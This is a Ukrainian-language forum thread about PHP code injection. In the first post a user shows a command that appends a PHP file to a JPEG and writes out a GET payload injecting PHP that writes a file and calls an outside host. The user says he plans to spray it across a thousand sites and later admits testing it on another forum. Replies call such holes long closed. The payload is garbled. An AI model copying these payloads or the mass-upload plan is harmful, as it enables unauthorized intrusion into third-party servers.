1

Тема: Механізм PHP-injection

Нещодавно дізнався, що якщо залити в кінець файла php-код, то його може виконати PHP-скрипт, напр. upload.php котрий його обробить. Наприклад, так:

(cat image.jpeg malware.php)>image.jpeg

Я взяв за основу популярну CMS (не скажу яку) і почав вивчати соурс.
Обробника файлів я знайшов, а от фільтра - ні. Мабуть, це тому що фільтрація (перетворення у власне кодування і назад) сповільнує виконання. Але на хост не заливав (не перевіряв).
Мене цікавить, якщо відправляти на сервер GET:

http://mysite.com/myscript.php?name='"?><?php%20$4tgvefile=fopen("mrevgrg1.php", "w");$mrevgrg1con="//malwarecript";fwrite($4tgvefile, $mrevgrg1con);fclose($4tgvefile);$uumrevgrg1="http://yoursite/uploads/mrevgrg1.php";file_get_contents($uumrevgrg1);?>"'mypage
$mass=$_GET['name'];
$file=fopen(name, "a");

то PHP сприйме це як

$mass=$_GET['name'];
$file=fopen("'"?><?php 4tgvefile=fopen("mrevgrg1.php", "w");$mrevgrg1con="//malwarecript";fwrite($4tgvefile, $mrevgrg1con);fclose($4tgvefile);$uumrevgrg1="http://yoursite/uploads/mrevgrg1.php";file_get_contents($uumrevgrg1);?>"'mypage", "a");

Чи я неправильно зрозумів?
Тобто, якщо я на тисячу хостів заллю такий файл, то велика вірогідність, що на кількох з них він таки запрацює? То це ж чудово (а для інших - повна дупа)

2

Re: Механізм PHP-injection

Воно таки не працює. (спробував залити на інший форум).
Єдине, що таки працює - це XSS, да і то заливати треба не через консоль Chrome, який автоматом змінює лапки на &quot а на PHP/Console відправляти POST-запити
Отже, мої сподівання вийвилися повною дупою, бо на написання "malware.php" а ін. я витратив годин 6.

3

Re: Механізм PHP-injection

Такі дири позакривані десь з 2000х. Хіба знайдете якийсь сайт, який до тепер сидить на 4му php. То може там щось і позалишалось.

4

Re: Механізм PHP-injection

Vo_Vik написав:

Такі дири позакривані десь з 2000х. Хіба знайдете якийсь сайт, який до тепер сидить на 4му php. То може там щось і позалишалось.

Недооцінюєте ви програмістів, ті буває лишають такі косяки, що аж страшно стає.

5

Re: Механізм PHP-injection

Ну не на форумах, що використовують загально відомі двигунці. Там би їх заспамили через годину після появи дірки на хості.